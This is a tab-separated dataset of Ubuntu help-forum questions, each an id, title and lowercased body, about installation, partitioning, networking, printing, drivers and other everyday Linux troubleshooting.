246243	ubuntu 12.10 showing incorrect size of already existing windows partitions	i 'm installing ubuntu 12.10 with live dvd and i have windows 7 already installed on my machine . my windows 7 partitions are : c : 150 gb ( windows 7 ) d : 150 gb ( free ) e : 300 gb ( used ) f : 10 gb ( used ) when it was asking for type of installation i chose something else as i want to install ubuntu on d : drive , it then scanned my hard disc and showed all the 4 partitions with incorrect size as : sda1 : 1 mb sda2 : 10 mb sda3 : 157 gb sda4 : 437 gb by looking at this number i was unable to locate 'd ' drive for installation . can you please help me to get rid of this ? why its showing incorrect partition size ?
246244	how to install banco do brasil security solution ?	banco do brasil uses its own security solution . there 's a lack of resources on getting that specific site ( brazilian 's largest bank ) working on ubuntu , even in askubuntu.com , so i 'm opening this question in order to have a community wiki on the subject .
246246	why does compiling c code on xubuntu fail ?	i recently did a fresh os reinstall - switched from opensuse to xubuntu . i had backed up all my scientific data post-processing scripts ( written in c or in fortran ) . code i had recently used and worked error free on suse gives errors mostly related to outputting character data ... help ! example error message : fbdcode.c:144:2 : warning : format ‘ % s’ expects argument of type ‘char *’ , but argument 3 has type ‘char ( * ) [ 100 ] ’ [ -wformat ] line 144 in my .c file is : fscanf ( infile_pp , `` % s % lf\n '' , & temp_str , & solvent_molec_wt ) ; variable temp_str is defined earlier in this manner : char temp_str [ 100 ] ;
246249	ubuntu 12.10 slow hard drive seek	i have just installed ubuntu 12.10 and performed all updates , everything seems to work as expected except the fact that it is slow : hard drive seeks each time i open something ( even if i just opened it ) if i launch two applications `` oh mon dieu catastrophe ! ! '' the system freezes a second each time i do something ... i 've just tried to unmount my iphone and after freezing the system a few seconds , a compiz error poped up . 2gb of ram core 2 duo t7300 @ 2ghz x 2 system monitor reports 485 of used ram and a cpu history around 10 % with peeks at 50 % . this is a clean install , my winows 7 install with an antivirus and firewall with all it 's bloat since the last years works like a charm and is extremely reactive ... thanks for helping me out : -/
246251	issue with cp command when i was copying in /var/www	i am not able to copy file in /var/www with sudo cp /home/index.html /var/www the error is cp : omitting directory '/home/index.html' then i used -r , sudo cp -r /home/index.html /var/www , then the error is cp : can not overwrite non-directory '/var/www/index.html ' with directory '/home/index.html'
246252	usb0 makes for an extremely slow boot	i got a brand new lenovo thinkpad t530 from my work recently , with xubuntu installed on it . it 's extremely snappy , apart from booting . the moment it 's slow ( ~2 minutes ) is between entering my password in the login screen up until the point where my desktop comes up . i 've been able to trace the problem to the existence of a usb0 network interface , which is trying to come up . if i run sudo ifconfig usb0 down before entering my password ( through another screen ) , it shows my desktop almost immediately . google does n't make me any wiser as to how i should disable this usb0 interface , but i 'm pretty sure i wo n't use it and i 'd like my laptop boot a bit faster .
246260	how can i preseed package installation without a network connection ?	i am working to create an unattended offline installation of the ubuntu server 12.04 . i have everything preseeded so far , but i still ca n't figure out how to install other packages without requiring a network connection . i would like to install puppet , and give it a personal configuration , but all of this should be done without requiring a network connection . how can this be done ? how can i add a package to the distribution ? thank you in advance ! : )
246263	ubuntu 12.04 : google cloud print credentials error	i am currently running ubuntu 12.04 and for a while before i have been using google cloud print to print things from my netbook running windows 7 starter to ubuntu printer . lately i have noticed that an error occurred that for some reason asks me to enter my email and password however when i click on the baloon message from chrome nothing loads . i do n't get this error on windows so what happened ? ? i have tried signing in and out but that did not work . how can i get it to work again ? or is there another way of sharing a printer from ubuntu to windows 7 starter edition ( no ipp on that one ) thanks .
246268	egalaxtouch calibration does not work at 12.04	i am using a samsung touchscreen ( lti220mt02 ) at ubuntu 12.04 with drivers from egalaxtouch . driver download from http : //home.eeti.com.tw/web20/eg/touch_drives.html . as desktop manager i use lightdm . i want to calibrate the touchscreen , but so far i have no success , the calibration is still not working . i have tried the following : 1 ) the 4-point-calibration tool 4pts cal from the egtouchu programm ( comes with the driver ) is always displayed as inactive ( can not be clicked ) . see image http : //downloads.wsunk.at/egtouchu.png i want to execute the 4pts cal but this is not possible , i do not know why . i have read in forums that normally this tool should be executable . does anyone know how to get 4pts cal working ? or does anyone know in which file and in which format the tool saves the calibration data ? 2 ) i have tried xinput_calibrator , the following output is shown : section `` inputclass '' identifier `` calibration '' matchproduct `` egalaxtouch virtual device for single '' option `` calibration '' `` 43 2039 52 1959 '' endsection in forums i have read to put this data not as shown by xinput_calibrator in /etc/x11/xorg.conf.d/99-calibration.conf but to put this data into /usr/share/x11/xorg.conf.d/99-calibration.conf . after reboot calibration still does not work . 3 ) i have tried to use xinput directly , xinput -- list results in : virtual core pointer id=2 [ master pointer ( 3 ) ] virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] dualpoint stick id=15 [ slave pointer ( 2 ) ] alpsps/2 alps dualpoint touchpad id=16 [ slave pointer ( 2 ) ] egalaxtouch virtual device for multi id=11 [ slave pointer ( 2 ) ] egalaxtouch virtual device for single id=12 [ slave pointer ( 2 ) ] virtual core keyboard id=3 [ master keyboard ( 2 ) ] virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] video bus id=6 [ slave keyboard ( 3 ) ] after executing the command : xinput set-int-prop 12 `` evdev axis calibration '' 32 43 2039 52 1959 still no calibration . for information , id=11 ( multi ) is from testing with another monitor , normally i use the touchscreen as single monitor . in a forum i have read to store the xinput-command in /etc/x11/xsession.d/98x11-common_touchscreen , but still no calibration after reboot . 4 ) in the file guide/linux_egtouch_release_note.txt from the driver download there is a line with : -the calibration data is now store at /etc/egtouchx.param however the file /etc/egtouchx.param does not exist . i can create it , but i do not know the format of the calibration data to put in . 5 ) i have found the file /etc/egtouchl.ini i did not found calibration data there . does anyone know , perhaps is this file needed for calibration ? please help ! regards , wasu
246269	how do i install curl with ares enabled	i have curl installed and that works fine , however i 've been reading about the blocking nature of the dns lookups and discovered that it 's slowing down my app . i 've done apt-get install libc-ares2 but i 'm not sure how to tell curl to use that library when doing a lookup .
246270	i want to run single o.s , how to install ubuntu ?	i am running windows 8 , and i want to format the c drive and only use a single os ( ubuntu ) run in my computer . i did install ubuntu alongside windows and it install and take more time so i shutdown the computer directly . i opened windows and it reduced my windows drive ( c ) size and not join again with c drive again try to install by selecting something else and to delete c drive and install in c drive bt message display on screen no root file system is defined . please correct this from the partitioning menu what do i do ?
246276	installing ubuntu on a windows 8 ( pre-installed ) laptop	i bought a new sony vaio laptop with windows 8 pre-installed . i want to install ubuntu and dual boot between windows 8 and ubuntu . i 've done this many times on windows 7 machines but i have no idea how to deal with this new uefi stuff . any help would be greatly appreciated . thanks
246278	server 2003 password reset help !	my issue arose when i was attempting to uninstall an application from my windows server 2003 box . i was constantly getting errors when trying to uninstall the software so i booted the server into safe mode with networking to troubleshoot the issue . to do this i ran msconfig and accidently restarted the server in safe mode without networking . this 2k3 box is enrolled in my active directory but is not a domain controller . once i realized what i did i tried entering the domain administrator password hoping that the profile and credentials would have been cached , but of course they were not . i then tried using what i believed was the local administrator password which was also unsuccessful . at this point i assumed the simplest thing to do would be to wipe the password out using chntpw which i had on an old disk from way back . i ran through the process and the commands completed successfully , and yes i made sure to use this to unlock the account as well , however when i reboot the server i still can not login . i think i am now at the point of stopping to try and reset the password , unless any of you can give me another idea of how to do this , and am wondering if there is anyway to get a command prompt open and run msconfig so i can rest the .ini and boot the server back up normally ? any help would be greatly appreciated .
246280	installing ubuntu in a virtual machine	i was triyng to install ubunto on a virtual machine , i was downloaded the 64bits version and it was all good until this appears `` this kernel requires an x86-64 cpu , but only detects an i686 cpu . unable to boot - please use a kernel appropriate for your cpu . '' what i do now ? information : cpu : intel core i7 ivybridge 3.40ghz ram : 6gb os : windows 7 64bits
246281	music downloads not here	i paid for two music downloads from ubuntu one music . they charged me of course . and guess what ? no sign if either soundfile anywhere on the computer . did a search of the home folder . they 're not in the music or ubuntu one folder , i looked . help , anybody ? thanks marc
246282	using emacs as terminal in ubuntu	i want to know whether there is any way i can use emacs as terminal in ubuntu . means , i want to do the basic works with emacs that i usually do with terminal in ubuntu , like 'sudo apt-get update ' . i 'll write this command and it 'll update my ubuntu system . is that possible ?
246283	bridge not working	after researching everything possible on kvm and bridged interfaces and trying everything in the ubuntu forums , i still can not get my guest to connect . guest ip : 192.168.10.150 host ip : 192.168.10.100 output/s from host : brctl show bridge name bridge id stp enabled interfaces br0 8000.14feb5d0655c no eth0 virbr0 8000.000000000000 yes brctl showmacs virbr0 port no mac addr is local ? ageing timer 1 52:54:00:45:12 : b8 no 212.59 1 fe:54:00:45:12 : b8 yes 0.00 ( 52:54:00:45:12 : b8 is the mac address for the guest ) ping 192.168.10.150 ping 192.168.10.150 ( 192.168.10.150 ) 56 ( 84 ) bytes of data . from 192.168.10.100 icmp_seq=1 destination host unreachable interface config : # the primary network interface auto eth0 iface eth0 inet manual auto br0 iface br0 inet static address 192.168.10.100 netmask 255.255.255.0 network 192.168.10.0 broadcast 192.168.10.255 gateway 192.168.10.1 bridge_ports eth0 bridge_maxwait 0 bridge_fd 0 bridge_hello 2 bridge_maxage 12 bridge_stp off any ideas on what might be going wrong ? thanks everybody !
246301	how to list text files without a .txt file extension ?	for example , how can i replicate ls *.txt when my text files are missing the .txt ending , and as far as extensions go appear the same as many other types of file ? alternatively , is it possible to list specifically just the files which have no file extension ? ( this happens to be equivalent ) thanks !
246304	how to figure out which wireless driver i need ?	i posted this question on superuser and was told to look up the specs for [ my ] specific wireless card and see if there is a linux driver for it ... . essentially i have an issue with my wireless configuration and it could be because of a bad or non-existent driver for my wireless card . i 'm new to ubuntu ( i have 12.04 installed ) and ca n't seem to find the exact model of my wireless card , and similarly , which driver i need for it . i tried running lsmod but could n't decipher if what i need is already loaded . so i ask : how can i tell what device driver is needed to support the wireless card that my laptop shipped with ? thanks in advance ! update : running lspci -nn | grep 0280 produces the following output : 02:00.0 network controller [ 0280 ] : broadcom corporation bcm43228 802.11a/b/g/n [ 14e4:4359 ] searching these forums for the 14e4:4359 driver , i found this post which seems to be very similar to the problem that i am having . however , seeing that my question is concerned with 12.04 , and the other question is with 12.10 , and seeing that the other question is not the exactly the same scenario as what i 'm describing , is more than 3 months old , and was never definitively answered , i argue that this is not a duplicate ! like that other question , running sudo iwconfig produces the following output on my machine : lo no wireless extensions . eth0 no wireless extensions . tun0 no wireless extensions . running sudo modprobe wl produces : fatal : module wl not found . running dmesg | grep wl produces : [ 2.232664 ] acpi error : [ eabf ] namespace lookup failure , ae_already_exists ( 20110623/dswload2-316 )
246310	which files refer to unallocated partition ?	# fdisk -l disk /dev/sda : 34.4 gb , 34359738368 bytes 255 heads , 63 sectors/track , 4177 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000d5d11 device boot start end blocks id system /dev/sda1 1 1265 10155008 83 linux /dev/sda2 1265 1457 1544192 82 linux swap / solaris my virtual machine have 34.4 gb disk , i had already divided it into 2 partitions /dev/sda1 ( 9.68 gib ) for root path and /dev/sda2 ( 1.47 gib ) for swap area , so that i have remain free space about 20.84 gib i can format unallocated space via gparted , but if i want to use command line such as mke2fs to handle this job , how i can refer to that free space to complete this command line . mke2fs -jv /dev/ < xxx >
246316	cant open software center	when i try to open sofware center i get this message and wont open , can you please help me to find the error ? jdash @ ubuntu : ~ $ software-center 2013-01-22 18:38:08,149 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-01-22 18:38:08,152 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2013-01-22 18:38:08,395 - softwarecenter.config - warning - could not read the config file '/home/jdash/.config/software-center/softwarecenter.cfg ' : file contains no section headers . file : d , line : 1 u'help on method triangular in module random : \n' 2013-01-22 18:38:08,396 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2013-01-22 18:38:08,487 - softwarecenter.ui.gtk3.app - info - show_available_packages : search_text is '' , app is none . 2013-01-22 18:38:08,738 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 176 , in < module > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1422 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1352 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 154 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 136 , in init_view softwarepane.init_view ( self ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/softwarepane.py '' , line 215 , in init_view self.icons , self.show_ratings ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/appview.py '' , line 69 , in __init__ self.helper = apppropertieshelper ( db , cache , icons ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/models/appstore2.py '' , line 109 , in __init__ softwarecenter.paths.app_install_path ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 255 , in parse_applications_menu category = self._parse_menu_tag ( child ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 440 , in _parse_menu_tag l = self._parse_directory_tag ( element ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 305 , in _parse_directory_tag cp.read ( fname ) file `` /usr/share/software-center/softwarecenter/db/update.py '' , line 535 , in read rawconfigparser.read ( self , filename ) file `` /usr/local/lib/python2.7/dist-packages/configparser.py '' , line 710 , in read self._read ( fp , filename ) file `` /usr/local/lib/python2.7/dist-packages/configparser.py '' , line 1093 , in _read raise missingsectionheadererror ( fpname , lineno , line ) configparser.missingsectionheadererror : file contains no section headers . file : d , line : 1 u'help on method triangular in module random : \n' this is the content of the file mark : [ general ] maximized = false size = 1200 , 800 add_to_launcher = true recommender_uuid = recommender_profile_id =
246320	how to mount disc with exec permissions	i have a storage drive i normally mount just clicking on the disc in the file browser . however , i want to be able to run some bash scripts from that drive . when i try ./script.sh i get permission denied . how can i set it up so i can run scripts from this drive ?
246322	2 gb ram , but ubuntu runs slowly and hangs if doing too much	i think my system more than meets the minimum/recommended requirements for ubuntu , but its still running slowly . especially when i try to multitask by having 4-6 windows open , then it becomes quite slow and often hangs completely . before this , i was using linux mint previously which ran perfectly ( but due to some software not working , i 've moved to ubuntu ) . my question is , if i replaced my ubuntu with xubuntu , will it run faster ( equivalent to how linux mint was running ) ? or do i have to go down to lubuntu ?
246323	why ssh “password” prompt takes too long to appear ?	when i try to connect ssh it takes too long ( almost 2 minutes ) to appear password prompt . why does this happens ?
246326	special character in smb field in printer dialog	i am trying to add a windows printer via samba from the new printer dialog in kubuntu 12.04 . the smb : // field does n't allow me to put special character or blank spaces , except for the underscore ( see screenshot ) . in particular , the url i am trying to add ( it was given to me by it people in my university ) contains a `` % 20 '' , which , i assume , should be interpreted as a space . is this normal ? can smb urls contain special characters ? why does n't this dialog allow me to do that ?
246327	how can i change unity dash to desktop mode	i am using a netbook , and i noticed that pressing the super key , which brings up the unity dash with the lenses , is a full-screen affair . i prefer the desktop version which does n't take up all of my screen . how do i change this ?
246331	fluxbox : no folder icons in thunar and pcmanfm	i have an ubuntu 12.10 installation and wanted to try out fluxbox as a lightweight window manager . when i open thunar it displays no icons for folders . i googled and made sure i have a .gtkrc-2.0 in my home directory . do you have any ideas what to try out ? kind regards - markus
246332	how to get netextender ( vpn ) working in ubuntu 12.10 x64 ?	at work we have to use sonicwall netextender to connect over vpn . the netextender client works fine on windows x64 for me , but when using the same settings in my ubuntu , the connection seems to work fine at first - but after just some packages have been sent , it slows down to almost 0 or 0 ( the connection is still up and seems fine ) some other people at work have the same netextender problem with their ubuntusetups , so we belive it 's some failure with the netextenderclient - or that some workaround is needed with it . so the question is : has anyone had success in using netextender on ubuntu 12.x , and what specific settings did you use ? also - are there any open source alternative netextender clients we could use instead of the sonicwalls one ? btw ( i tried stuff like this http : //www.webantix.net/2012/02/sonicwall-netextender-on-ubuntu-x64.html ) also tried with latest netextenderpackage `` netextender.linux.7.0.741.x86_64 '' and it 's the same symptoms - i can connect successfully , fetch about one webpage , and then everything just seem to stall . i also upgraded to ubuntu 13.04 . irritating that it works flawlessly on the same machine with windows 7 in dualboot , same settings .
246333	i get this message when i try to install software in the software center ubuntu 12.10 . no fixes i saw here helped	software ca n't be installed or removed because the authentication service is not available . ( org.freedesktop.policykit.error.failed : ( 'system-bus-name ' , { 'name ' : ':1.168 ' } ) : org.debian.apt.install-or-remove-packages
246337	can evolution always use the same font/colour when starting a new email ?	when i start to write a new email , using evolution , i must manually change the font i want to use and its colour . is there a way to set the default text format ?
246338	kde , gnome popularity comparison	how popular is kde ? i found several sources saying that it 's the most popular desktop environment , but i 've also read that popular third-party software ( firefox , for example ) are written for gnome since that is more popular . so what 's the official answer ? note : i 'm not asking which one is better this was based on a poll : http : //www.muktware.com/articles/3518/kde-voted-most-popular-desktop-environment this is a blog post : http : //www.thepowerbase.com/2012/01/5-reasons-why-kde-is-better-than-unity/ basically , i did n't find a good official answer .
246339	windows has broken and will not boot nor reinstall , need to install ubuntu . partition questions	the title explains what has happened . this is on a lenovo y560p . now what i need to know is when i install from the live cd i want format the c drive ( we have got all the data ) as i do not want to override the lenovo recovery partitions ? will this play okay with the bootloader ? or shall i just format the the whole drive ? many thanks !
246343	what is the virbr0 interface used for ?	virbr0 link encap : ethernet hwaddr a2:17 : ea : e3:47:7e inet addr:192.168.122.1 bcast:192.168.122.255 mask:255.255.255.0 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) can anyone tell me what this interface does and how i can change the ip address ? i want to see if it is the reason my guests can not connect .
246349	update manager doesnt work	my update manager does n't work and comes up with this : please check your internet connection w : failed to fetch http : //ppa.launchpad.net/ferramroberto/java/ubuntu/dists/quantal/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/ferramroberto/java/ubuntu/dists/quantal/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . but my internet connection is fine please help .
246351	why do i see a difference in file count between nautilus and find ?	for a university project , i have to count all the files in a folder . i have used the command : find ./dirname | wc -l although when i compare this to the file count provided by nautilus it is considerably more . see the screenshot below : ./dirname is actually a directory of files from a repository ( svn/git ) and i need to find out how many files make up the system . could anyone explain why these differences occur and maybe tell me which one is more reliable ?
246352	init.d startup script not working for no-ip	i have just installed no-ip on a brand new ubuntu 12.04 install . the program starts fine when i start it from the cli , but if i try to make this startup script work it wo n't start . i got this script from their install instructions : # ! /bin/sh # . /etc/rc.d/init.d/functions # uncomment/modify for your killproc case `` $ 1 '' in start ) echo `` starting noip2 . '' /usr/local/bin/noip2 ; ; stop ) echo -n `` shutting down noip2 . '' killall -term /usr/local/bin/noip2 ; ; * ) echo `` usage : $ 0 { start|stop } '' exit 1 esac exit 0 the cl is correct because if i run /usr/local/bin/noip2 it starts . but the script itself wo n't start it . what do i have wrong in there ? the script is executable : -rwxrwxrwx 1 root root 299 jan 12 13:28 noip* edit if i try the init.d script it also works : sudo /etc/init.d/noip start it starts up just fine that way without a hitch .
246356	alt+tab multi displays	i 'm ubuntu 12.04 with gnome shell on a hp pavilion dm4 with an external display . when i try to switch between applications using the alt+tab shortcut , the box showing the applications is showed only on the laptop 's display . there 's a way to make the box appear in both displays ?
246359	why is there no efi boot loader on the ubuntu 12.10 x64 netinstall ? ( mini.iso )	im trying to boot the netinstall ( mini.iso ) toasted to an usb-stick , but there is no efi loader in that iso image . so it is not possible to load that kind of installation type on an efi powered system . in my desperation i copied the /efi folder with its loader from the desktop install media to my netinstall usb-stick . dont know if this way is legit , but it loaded the installer screen . but big problem is , that the installer-screen is horrible distorted so i cant see anything and cant install . also the installer seems to pressed into the upper half of the screen and has a high resolution ( because it seems small , what i can see ) . btw the desktop iso boots successfully . but im using a complex setup of encrypted lvm with multiple drives wich can not be setup by desktop-installer in that scale , so i need the debian-based-installer . since alternate iso 's have been discontinued , the netinstall media is my last option . i hope you can understand and respect my usage scenario . i know with every release ubuntu is more less willing to support professional users and focus on normal home users , but im loyal and realy want to continue using ubuntu . so im also hoping for your help .
246361	unable to link to vtk library	the project i 'm working on fails to link properly . it is built with cmake . it use to compile & link fine , before the pc got updated ( buntu11.04 to 12.04 , installed packages updated as well ) . the projects vtk is ver 5.8.0 . the err is : undefined reference to qvtkwidget2 : :qvtkwidget ( qwidget* , qglwidget const* , qflags ) this is a call to vtk/guisupport/qt/qvtkwidget2.cxx . from here i 'm lost . i do n't know which library is missing . i.e . which lib has the qvtkwidget2 class ? how do i find this ? i 've tried ldd vtk/build/bin/somelibs.so , but all i 'm finding are more *.so libs . is there a similar cmd that i can use to find out what is in the somecompiled.a files ?
246363	setting up wireshark for non root user	i am setting up wireshark to run as non root user , a la here , that is : sudo apt-get install wireshark sudo dpkg-reconfigure wireshark-common sudo usermod -a -g wireshark $ user ( restart ) this is all great . but when i try to start wireshark as the wireshark user , using : sudo -s -u $ user wireshark i get the following error : no protocol specified gtk-warning ** can not open display the `` no protocol specified '' part seems pretty straight forward . and the gtk-warning can not open display seems to relate exactly to this issue . `` you have two ways to get this working : grant it or have root take it . you ( greg ) can grant it by means of 'xhost local : root ' . or root can take it , because it can access your files : 'export authority=/home/greg/.xauthority ' . '' this does n't make sense to me . what was the point in granting access to the other user if they ca n't open the program anyway ? this separating is done for security reasons , so is n't making that above modification reverting the earlier comment '' this has to do with access control to your x server . you do n't want just anybody opening windows on your screen , do you . so if you started the x server under your own account ( greg ) then any other user ( like root ) does n't have access to it . '' tldr ; is this standard practice and the way this should be done , to achieve separation between root and other user account ? it seems like a `` hack '' to me .
246365	setting mouse to left handed has no effect in xubuntu ?	i 'm trying out xubuntu via the live usb . i need to set the mouse to be left handed , i.e so when i 'right click ' , its treated as a left click , and vice versa . this works fine in ubuntu , but in xubuntu , if i go to settings - > mouse and set it as left handed , it has no effect . is this a bug , or only a problem that occurs on the live cd ? should i install or will this problem persist ?
246377	client cups prints only on reboot	is this cups printing behaviour normal ? cups server and printer running on one 12.04 pc . client laptop 12.04 on home network boots , sees the printer available . lpstat -p shows printer idle . do a print , but does not print , goes to queue with lpstat -p reporting `` now printing '' and `` printer is not responding '' log off and log on laptop has no effect . reboot the laptop , and before logon , the queued print prints . further printing after logon works immediately . it is as if there needs to be a print in the laptop queue on boot before service works . any idea what is wrong ? answers network is fine at all times - connects to shared drive on main pc as well as internet . logs follow . the printout is in the print queue as seen on laptop and is not in print queue as seen on pc because the laptop apparently fails to make the cups connection , document print status for the printer reporting `` printer may not be connected '' , until rebooting , which causes it to print . on the laptop , the logs are - /var/log/cups/access_log localhost - - [ 23/jan/2013:18:05:26 +0000 ] `` post / http/1.1 '' 200 176 create-printer-subscription successful-ok localhost - - [ 23/jan/2013:18:07:14 +0000 ] `` post / http/1.1 '' 200 251 create-printer-subscription successful-ok localhost - - [ 23/jan/2013:18:07:22 +0000 ] `` post / http/1.1 '' 200 340 create-printer-subscription successful-ok localhost - - [ 23/jan/2013:18:07:22 +0000 ] `` post / http/1.1 '' 200 340 create-printer-subscription successful-ok localhost - - [ 23/jan/2013:18:07:24 +0000 ] `` post / http/1.1 '' 200 151 cancel-subscription successful-ok localhost - - [ 23/jan/2013:18:07:24 +0000 ] `` post / http/1.1 '' 200 151 cancel-subscription successful-ok localhost - - [ 23/jan/2013:18:07:39 +0000 ] `` post /printers/officejet http/1.1 '' 200 239 create-job successful-ok localhost - - [ 23/jan/2013:18:07:39 +0000 ] `` post /printers/officejet http/1.1 '' 200 6331 send-document successful-ok localhost - - [ 23/jan/2013:18:07:49 +0000 ] `` post / http/1.1 '' 200 340 create-printer-subscription successful-ok localhost - - [ 23/jan/2013:18:07:49 +0000 ] `` post / http/1.1 '' 200 340 create-printer-subscription successful-ok localhost - - [ 23/jan/2013:18:10:02 +0000 ] `` post / http/1.1 '' 200 151 cancel-subscription successful-ok localhost - - [ 23/jan/2013:18:10:02 +0000 ] `` post / http/1.1 '' 200 151 cancel-subscription successful-ok localhost - - [ 23/jan/2013:18:10:04 +0000 ] `` post / http/1.1 '' 200 151 cancel-subscription successful-ok the above when trying to print subsequent to typing the above , further entries are : localhost - - [ 23/jan/2013:18:19:27 +0000 ] `` post / http/1.1 '' 401 186 renew-subscription successful-ok localhost - ray [ 23/jan/2013:18:19:27 +0000 ] `` post / http/1.1 '' 200 186 renew-subscription successful-ok and on trying to print again at 18:30 : localhost - - [ 23/jan/2013:18:30:14 +0000 ] `` post /printers/officejet http/1.1 '' 200 239 create-job successful-ok localhost - - [ 23/jan/2013:18:30:14 +0000 ] `` post /printers/officejet http/1.1 '' 200 7038 send-document successful-ok localhost - - [ 23/jan/2013:18:30:47 +0000 ] `` post / http/1.1 '' 200 251 create-printer-subscription successful-ok it seems to cancel and renew subscriptions periodically . /var/log/cups/error_log e [ 23/jan/2013:18:05:13 +0000 ] unknown directive systemgroup on line 16 of /etc/cups/cupsd.conf . e [ 23/jan/2013:18:07:39 +0000 ] [ job 15 ] the printer is not responding . the first line happening on boot , and the second line then repeating every 30 seconds , independent of attempting to print . the referenced line 16 of /etc/cups/cupsd.conf is : systemgroup lpadmin lpadmin is a group of which i am a member ( on laptop and pc ) but i would n't have thought this has a bearing on the problem . on the pc ( cups server ) the access log says : localhost - - [ 23/jan/2013:18:29:23 +0000 ] `` post / http/1.1 '' 401 244 cups-get-devices successful-ok localhost - root [ 23/jan/2013:18:29:23 +0000 ] `` post / http/1.1 '' 200 1809 cups-get-devices - localhost - - [ 23/jan/2013:18:29:23 +0000 ] `` post /admin/ http/1.1 '' 401 142 resume-printer successful-ok localhost - root [ 23/jan/2013:18:29:23 +0000 ] `` post /admin/ http/1.1 '' 200 142 resume-printer successful-ok localhost - - [ 23/jan/2013:18:29:23 +0000 ] `` post /admin/ http/1.1 '' 401 142 resume-printer successful-ok localhost - root [ 23/jan/2013:18:29:23 +0000 ] `` post /admin/ http/1.1 '' 200 142 resume-printer successful-ok localhost - - [ 23/jan/2013:18:29:23 +0000 ] `` post /admin/ http/1.1 '' 401 146 resume-printer successful-ok localhost - root [ 23/jan/2013:18:29:23 +0000 ] `` post /admin/ http/1.1 '' 200 146 resume-printer successful-ok localhost - ray [ 23/jan/2013:18:40:54 +0000 ] `` post / http/1.1 '' 200 186 renew-subscription successful-ok the pc error log says e [ 23/jan/2013:18:29:23 +0000 ] failed to update txt record for hp officejet 4500 g510g-m @ tower3 : -2 e [ 23/jan/2013:18:29:23 +0000 ] failed to update txt record for hp fax @ tower3 : -2 ** on laptop reboot at 19:01 , with printing happening at 19:01-2 ** pc ( server ) error log has nothing pc ( server access log has 192.168.1.5 - - [ 23/jan/2013:19:01:49 +0000 ] `` post /printers/officejet-4500-g510g-m http/1.1 '' 200 450 validate-job successful-ok 192.168.1.5 - - [ 23/jan/2013:19:01:49 +0000 ] `` post /printers/officejet-4500-g510g-m http/1.1 '' 200 450 create-job successful-ok 192.168.1.5 - - [ 23/jan/2013:19:01:49 +0000 ] `` post /printers/officejet-4500-g510g-m http/1.1 '' 200 6313 send-document successful-ok 192.168.1.5 - - [ 23/jan/2013:19:01:50 +0000 ] `` post /printers/officejet-4500-g510g-m http/1.1 '' 200 450 validate-job successful-ok 192.168.1.5 - - [ 23/jan/2013:19:01:50 +0000 ] `` post /printers/officejet-4500-g510g-m http/1.1 '' 200 450 create-job successful-ok 192.168.1.5 - - [ 23/jan/2013:19:01:50 +0000 ] `` post /printers/officejet-4500-g510g-m http/1.1 '' 200 7020 send-document successful-ok as the 2 print jobs printed on laptop the access log has localhost - - [ 23/jan/2013:19:02:06 +0000 ] `` post / http/1.1 '' 200 176 create-printer-subscription successful-ok and the error log has only e [ 23/jan/2013:19:01:46 +0000 ] unknown directive systemgroup on line 16 of /etc/cups/cupsd.conf . i hope this helps . ** 26/1/13 reply added ** i had added a reply , but it seems to have not appended . yes , `` the printer is not responding '' appears in the client error log . all ok with the printer from the server pc . fromagegb
246385	can resolve hostname via dns using `host` but ca n't ping/ssh/ntp	i 'm setting up a local network and have configured a dns server . i can resolve hostnames by querying the dns server , but no programs can look them up . i uninstalled libnss-mdns and removed avahi-daemon and even rebooted afterwards . here are some examples : root @ cloud2 : ~ # host ns.example.com ns.example.com has address 10.10.10.100 root @ cloud2 : ~ # ping ns.example.com ping : unknown host ns.example.com root @ cloud2 : ~ # grep hosts /etc/nsswitch.conf hosts : files dns my ntp server is configured for ns.example.com , but all i get is nxdomain on ntpq any ideas ? edit : this also applies to external dns entries . i have my router both as a dns forwarder on the custom dns server and as an entry in resolvconf . e.g . root @ cloud2 : ~ # host google.com | head google.com has address 74.125.225.65 google.com has address 74.125.225.66 google.com has address 74.125.225.67 google.com has address 74.125.225.68 google.com has address 74.125.225.69 google.com has address 74.125.225.70 google.com has address 74.125.225.71 google.com has address 74.125.225.72 google.com has address 74.125.225.73 google.com has address 74.125.225.78 root @ cloud2 : ~ # traceroute google.com google.com : temporary failure in name resolution can not handle `` host '' cmdline arg `google.com ' on position 1 ( argc 1 )
246386	ubuntu vpn server setup	i followed the instructions that the answer on this thread gave , easiest way to setup ubuntu as a vpn server . however , i can not get it to work . when i try to connect to my network , it just says the server can not be reached . i setup the remote ip options ( which i uncommented ) to be 10.0.2.2-100 . my router serves out 10.0.1.2-250 . i also have users setup , but they are uncommented as well . i assume you need to uncomment them ?
246390	wubi permission denied	i 'm trying to install ubuntu using wubi , however i get the error message permission denied while installing . does anyone know a solution ? full error log : http : //pastebin.com/5hjkwdcy
